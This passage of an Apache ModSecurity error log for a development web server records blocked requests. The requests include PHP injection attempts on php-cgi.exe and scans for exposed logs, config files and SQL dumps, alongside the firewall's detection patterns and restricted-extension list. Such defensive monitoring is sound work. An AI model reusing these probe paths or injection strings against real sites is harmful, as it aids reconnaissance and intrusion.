"PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/wp-content/debug.log"] [unique_id "aSPMqaIJG-JeoAi5rHOTrAAAANQ"] [Wed Nov 26 04:10:25.120834 2025] [:error] [pid 31733:tid 31784] [client 138.197.191.87:50620] [client 138.197.191.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aSZhkerHkZRjgoptuu5hRgAAAIE"] [Wed Nov 26 04:10:26.190317 2025] [:error] [pid 31980:tid 32004] [client 164.92.244.132:42060] [client 164.92.244.132] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "web.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aSZhkvVOyG0edhXjuyFr5QAAANU"] [Wed Nov 26 04:10:26.692805 2025] [authz_core:error] [pid 31980:tid 32000] [client 138.197.191.87:50686] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Wed Nov 26 04:10:28.499215 2025] [authz_core:error] [pid 31733:tid 31819] [client 164.92.244.132:43256] AH01630: client denied by server configuration: /home/id/dev-unit.com/devweb-lastV/public/server-status [Sat Nov 29 02:28:04.715042 2025] [:error] [pid 5933:tid 5986] [client 44.233.249.141:42102] [client 44.233.249.141] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/php_error.log"] [unique_id "aSo-FO_dPJ-Q-bTs_F6-DQAAAVU"] [Sat Nov 29 02:28:20.001795 2025] [:error] [pid 5933:tid 5989] [client 44.233.249.141:54966] [client 44.233.249.141] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/.config"] [unique_id "aSo-JO_dPJ-Q-bTs_F6-TwAAAVg"] [Sat Nov 29 02:28:21.711655 2025] [:error] [pid 5933:tid 5973] [client 44.233.249.141:42102] [client 44.233.249.141] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/app.config"] [unique_id "aSo-Je_dPJ-Q-bTs_F6-WQAAAUg"] [Sat Nov 29 02:28:27.753399 2025] [:error] [pid 5188:tid 5192] [client 44.233.249.141:42464] [client 44.233.249.141] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/error.log"] [unique_id "aSo-K2v8RF3_9JgJ6R57BgAAAAA"] [Sat Nov 29 02:28:32.306717 2025] [:error] [pid 5933:tid 5976] [client 44.233.249.141:42102] [client 44.233.249.141] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/web.config"] [unique_id "aSo-MO_dPJ-Q-bTs_F6-vAAAAUs"] [Sat Nov 29 02:28:33.979064 2025] [:error] [pid 6223:tid 6226] [client 44.233.249.141:34974] [client 44.233.249.141] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/debug.log"] [unique_id "aSo-MU9d1YzC98Q-cYWmlQAAAME"] [Sat Nov 29 02:28:34.916270 2025] [:error] [pid 6223:tid 6233] [client 44.233.249.141:34974] [client 44.233.249.141] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/errors.log"] [unique_id "aSo-Mk9d1YzC98Q-cYWmmAAAAMg"] [Sat Nov 29 15:14:27.022648 2025] [:error] [pid 14678:tid 14682] [client 18.175.120.179:54930] [client 18.175.120.179] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/config.ini"] [unique_id "aSrxs9Wq7euULuggmM-AAQAAAUI"] [Wed Dec 03 00:32:51.424576 2025] [:error] [pid 26358:tid 26365] [client 38.114.122.142:42194] [client 38.114.122.142] ModSecurity: Access denied with code 403 (phase 2). Found 30 byte(s) in ARGS:_path outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "web.dev-unit.com"] [uri "/_fragment"] [unique_id "aS9pE3BPRgDNPHBB-xrK5gAAAMQ"] [Wed Dec 03 06:35:55.681028 2025] [:error] [pid 32076:tid 32097] [client 18.198.207.209:47668] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/backup.sql"] [unique_id "aS--KzYrEbMiLh1vkdaAyAAAANM"] [Wed Dec 03 06:35:55.746092 2025] [:error] [pid 32076:tid 32090] [client 18.198.207.209:47670] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/db_backup.sql"] [unique_id "aS--KzYrEbMiLh1vkdaAyQAAAMw"] [Wed Dec 03 06:35:55.815880 2025] [:error] [pid 32076:tid 32082] [client 18.198.207.209:47686] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/database.sql"] [unique_id "aS--KzYrEbMiLh1vkdaAygAAAMQ"] [Wed Dec 03 06:35:55.879408 2025] [:error] [pid 31876:tid 32002] [client 18.198.207.209:47702] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/dump.sql"] [unique_id "aS--K8lX2eRobly9P_QnRQAAAI8"] [Wed Dec 03 06:35:56.315824 2025] [:error] [pid 32076:tid 32085] [client 18.198.207.209:47736] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/Thumbs.db"] [unique_id "aS--LDYrEbMiLh1vkdaAzgAAAMc"] [Wed Dec 03 06:35:56.375964 2025] [:error] [pid 31872:tid 31956] [client 18.198.207.209:47748] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/storage/logs/laravel.log"] [unique_id "aS--LAHUOyVUpr_c5AKGDQAAABE"] [Wed Dec 03 06:35:56.434997 2025] [:error] [pid 31872:tid 31952] [client 18.198.207.209:47754] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/app/logs/prod.log"] [unique_id "aS--LAHUOyVUpr_c5AKGDgAAAA0"] [Wed Dec 03 06:35:56.492020 2025] [:error] [pid 32076:tid 32089] [client 18.198.207.209:47758] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/app/logs/dev.log"] [unique_id "aS--LDYrEbMiLh1vkdaA0AAAAMs"] [Wed Dec 03 06:35:56.553798 2025] [:error] [pid 31876:tid 32014] [client 18.198.207.209:47772] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/logs/application.log"] [unique_id "aS--LMlX2eRobly9P_QnRgAAAJU"] [Wed Dec 03 06:35:57.382827 2025] [:error] [pid 31876:tid 31988] [client 18.198.207.209:47826] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/debug.log"] [unique_id "aS--LclX2eRobly9P_QnSAAAAIg"] [Wed Dec 03 06:35:57.445768 2025] [:error] [pid 31872:tid 31962] [client 18.198.207.209:47840] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/error.log"] [unique_id "aS--LQHUOyVUpr_c5AKGEwAAABc"] [Wed Dec 03 06:35:57.504938 2025] [:error] [pid 31876:tid 32016] [client 18.198.207.209:47842] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "web.dev-unit.com"] [uri "/errors.log"] [unique_id "aS--LclX2eRobly9P_QnSQAAAJc"] [Wed Dec 03 06:35:57.568209 2025] [:error] [pid 31872:tid 31949] [client 18.198.207.209:47850] [client 18.198.207.209] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ 